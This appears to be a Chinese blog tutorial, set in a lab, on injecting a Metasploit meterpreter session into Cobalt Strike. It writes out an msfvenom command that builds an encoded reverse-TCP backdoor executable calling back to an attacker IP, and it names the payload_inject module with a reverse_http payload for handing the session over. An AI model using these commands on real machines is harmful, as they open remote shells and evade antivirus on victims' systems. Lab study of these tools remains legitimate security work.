首页 > 其他分享 >CobaltStrike注入MSF会话

CobaltStrike注入MSF会话

时间:2022-11-27 16:22:45浏览次数:40  
标签:exe reverse windows CobaltStrike 会话 msf MSF meterpreter payload

本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关

准备工作

kali机开启CS服务器

Win10开启msf、CS客户端

Win7充当一台靶机

 

 

第一步:利用msfvenom生成后门,并且上传到靶机让其执行,获得meterpreter

生成后门(路径就是当前路径了,就在桌面)

命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.21.125.215 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

 

 然后把payload.exe上传到win7里面(可以用python开一个服务传递,命令 python -m http.server 端口号,我这里直接上传了)

 利用msf得到meterpreter

 开启监听

 靶机运行payload.exe,即得到meterpreter

 

第二步:设置msf,达到与CobaltStrike连接

先让meterpreter进入后台模式

 然后加载msf的payload注入功能 (use exploit/windows/local/payload_inject),并且设置payload(set payload windows/meterpreter/reverse_http),注意这里末尾是reverse_http

 然后设置参数

 run

 然后设置CS客户端

 如果没有上线,可以在msf中多run几次

 

标签:exe,reverse,windows,CobaltStrike,会话,msf,MSF,meterpreter,payload
From: https://www.cnblogs.com/reweber/p/16929937.html

相关文章

  • CobaltStrike注入MSF会话
    本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关准备工作kali机开启CS服务器Win10开启msf、CS客户端Win7充当一台靶机  第一步:利用msfve......
  • 第五十九章 CSP的常见问题 - 会话和许可证,为什么我要经常登录?
    第五十九章CSP的常见问题-会话和许可证,为什么我要经常登录?当我尝试加载CSP页面时,出现以下错误:错误#5924:出现错误,无法显示指定的错误页面-请通知网站管理员。这是什么......
  • 会话丢失-NGINX配置之underscores_in_headers
    1.描述问题NGINX代理某个web服务时,单机情况下也出现不停的要求认证的情况初步分析去掉NGINX代理,直接访问服务,未出现上述情况;进一步分析:查看经过NGINX的请求和直接访问服......
  • 红队隧道加密之MSF流量加密(二)
    前言如今大多数企业的内网都部署了流量审计服务,用来专门分析流量特征,比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透,其产生的流量会很容易被内网......
  • day22-web开发会话技术04
    WEB开发会话技术0414.Session生命周期14.1生命周期说明publicvoidsetMaxInactiveInterval(intinterval):设置session的超时时间(以秒为单位),超过指定的时长,session......
  • mysql隔离级别参数和会话动态设置--笔记
    1、参数设置可选参数有:READ-UNCOMMITTED,READ-COMMITTED,REPEATABLE-READ,SERIALIZABLE.如:transaction_isolation=REPEATABLE-READ或transaction-isolation=READ-CO......
  • 由于协议错误,会话将被中断。请重新连接到远程计算机。
    前两天用远程桌面连接服务器时报错:由于协议错误,会话将被中断。请重新连接到远程计算机。本以为是服务器的一般性错误,以为重新启动一下服务器就能解决问题,于是让机房重启了......
  • day21-web开发会话技术03
    WEB开发会话技术0310.问题引出问题引出不同的用户登录网站后,不管该用户浏览网站的哪个页面,都可以显示登录人的名字,还可以随时去查看自己购物车中的商品,这是如何实现......
  • 内网渗透神器CobaltStrike之钓鱼攻击(六)
    一、HTA木马简介HTA是HTMLApplication的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有......
  • day20-web开发会话技术02
    WEB开发会话技术026.Cookie的生命周期默认情况下,Cookie只在浏览器的内存中存活,也就是说,当你关闭浏览器后,Cookie就会消失。但是也可以通过方法设置cookie的生存时间。coo......